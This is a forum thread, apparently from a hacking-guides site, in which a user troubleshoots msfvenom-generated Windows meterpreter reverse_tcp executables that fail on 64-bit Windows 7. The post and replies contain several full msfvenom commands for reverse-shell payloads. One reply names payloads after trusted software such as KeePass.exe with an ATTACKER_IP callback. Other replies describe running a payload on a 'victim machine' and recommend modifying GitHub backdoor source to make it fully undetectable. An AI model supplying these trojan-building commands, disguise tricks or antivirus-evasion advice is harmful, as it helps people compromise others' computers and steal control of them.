Problem with Msfvenom: Windows 7 64-Bit Exe - The Version of This File Is Not Compatible.

I'm trying to create a windows executable meterpreter payload using msfvenom to execute on my own computer running Windows 7 64-bit. I've tried using the following commands to produce the executable:

1.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe

2.) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe

3.) msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe

4.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -k -f exe > trojan.exe

I've also tried using encoders and other payloads.

I tried running the executables on multiple Windows 7 64-bit OS computers, but all I got was this message:

"The version of this file is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher."

When I tried running it in command prompt it showed me this:

Unsupported 16-Bit Application

"The program or feature cannot start or run due to incompatibility with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available."

I'm running Metasploit Framework on both Linux Mint and Kali Linux.

I've port forwarded the port, tried changing the IP address, turned off all firewalls and AV software, as well as reinstalling Linux Mint and Kali Linux and updating them plus Metasploit Framework.

I've tried google to find a solution, but so far I haven't found it.

Any ideas on this problem? Any help would be appreciated.

Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.

5 Responses

prove with this....

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe-only > trojan.exe

me computer also showing the same issued.and i want to know is there any way to create a multi architectural payload option.

Hi,
you can use this. i think this will work for you (works for 64 bit)

msfvenom -p windows/meterpreter/reversetcp LHOST=ATTACKER_IP --format exe --arch x86 --platform windows --encoder x86/shikataga_nai --iteration 4 --smallest --out WiseCare365Pro5.4.3.539

or:

msfvenom -p windows/x64/meterpreterreversetcp LHOST=ATTACKER_IP --format exe --arch x64 --platform windows --encoder x64/xor --iteration 2 --out KeePass.exe

I also tried with win7 64bit pc .. I created payload using msfvenom and copied it to victim machine. Then I used multi handler as the listener and executed payload in victim machine using cmd .. but the shell didnt poped up

"Msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=my ip LPORT=4444 -o windows.exe " is the command I used

Your big issue is that you're using Metasploit. Even on a target with rudimentary antivirus, any payload MSF generates (regardless of how many encoder layers you stack on - those aren't actually designed to protect against detection anyhow for the most part) will light up like a christmas tree. I would suggest looking into alternative shell delivery mechanisms. Github, for example, has a lot of backdoor source you can modify to make it FUD, then compile for your target. This only requires intermediate skill at most, and will result in far better stability for your compromise.

Share Your Thoughts

  • Hot
  • Active